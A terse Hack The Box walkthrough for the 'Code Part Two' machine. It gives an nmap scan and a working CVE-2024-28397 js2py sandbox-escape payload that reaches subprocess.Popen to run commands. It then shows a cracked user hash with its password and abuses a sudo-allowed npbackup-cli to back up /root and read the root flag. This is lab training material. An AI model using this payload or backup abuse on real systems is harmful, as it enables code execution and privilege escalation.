Code Part Two - Hack The Box Machine

September 2025

User Flag

Nmap scan report for 10.10.11.82
Host is up (0.15s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
8000/tcp open  http    Gunicorn 20.0.4
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

https://github.com/waleed-hassan569/CVE-2024-28397-command-execution-poc/blob/main/payload.js

let cmd = "python3 -m http.server 8888"
let hacked, bymarve, n11
let getattr, obj

hacked = Object.getOwnPropertyNames({})
bymarve = hacked.__getattribute__
n11 = bymarve("__getattribute__")
obj = n11("__class__").__base__
getattr = obj.__getattribute__

function findpopen(o) {
    let result;
    for (let i in o.__subclasses__()) {
        let item = o.__subclasses__()[i]
        if (item.__module__ == "subprocess" && item.__name__ == "Popen") {
            return item
        }
        if (item.__name__ != "type" && (result = findpopen(item))) {
            return result
        }
    }
}

// run the command and force UTF-8 string output
let proc = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true)
let out = proc.communicate()[0].decode("utf-8")

// return a plain string (JSON-safe)
"" + out

Got the users.db file

sqlite> select * from user;
1|marco|649c9d65a206a75f5abe509fe128bce5
2|app|a97588c0e2fa3a024876339e27aeb42e

649c9d65a206a75f5abe509fe128bce5:sweetangelbabylove

Root Flag

User marco may run the following commands on codeparttwo:
    (ALL : ALL) NOPASSWD: /usr/local/bin/npbackup-cli

https://github.com/AliElKhatteb/npbackup-cli-priv-escalation

marco@codeparttwo:~$ nano npbackup.conf
marco@codeparttwo:~$ sudo /usr/local/bin/npbackup-cli -c npbackup.conf --backup
2025-09-15 21:28:18,753 :: INFO :: npbackup 3.0.1-linux-UnknownBuildType-x64-legacy-public-3.8-i 2025032101 - Copyright (C) 2022-2025 NetInvent running as root
2025-09-15 21:28:18,799 :: INFO :: Loaded config FD1646D6 in /home/marco/npbackup.conf
2025-09-15 21:28:18,821 :: INFO :: Searching for a backup newer than 1 day, 0:00:00 ago
2025-09-15 21:28:21,090 :: INFO :: Snapshots listed successfully
2025-09-15 21:28:21,091 :: INFO :: No recent backup found in repo default. Newest is from 2025-04-06 03:50:16.222832+00:00
2025-09-15 21:28:21,091 :: INFO :: Runner took 2.270234 seconds for has_recent_snapshot
2025-09-15 21:28:21,092 :: INFO :: Running backup of ['/root'] to repo default
no parent snapshot found, will read all files

Files:          15 new,     0 changed,     0 unmodified
Dirs:            8 new,     0 changed,     0 unmodified
Added to the repository: 190.612 KiB (39.882 KiB stored)

processed 15 files, 197.660 KiB in 0:00
snapshot a31b1a3f saved
2025-09-15 21:28:23,363 :: INFO :: Backend finished with success
2025-09-15 21:28:23,365 :: INFO :: Processed 197.7 KiB of data
2025-09-15 21:28:23,365 :: INFO :: Operation finished with success
2025-09-15 21:28:23,366 :: INFO :: Runner took 4.546822 seconds for backup
2025-09-15 21:28:23,366 :: INFO :: Operation finished
2025-09-15 21:28:23,373 :: INFO :: ExecTime = 0:00:04.624992, finished, state is: success.
marco@codeparttwo:~$ sudo /usr/local/bin/npbackup-cli -c npbackup.conf --dump root.txt --snapshot-id a31b1a3f
Fatal: cannot dump file: path "/root.txt" not found in snapshot
marco@codeparttwo:~$ sudo /usr/local/bin/npbackup-cli -c npbackup.conf --dump /root/root.txt --snapshot-id a31b1a3f
f0c75ed572b84d245d48499923648e38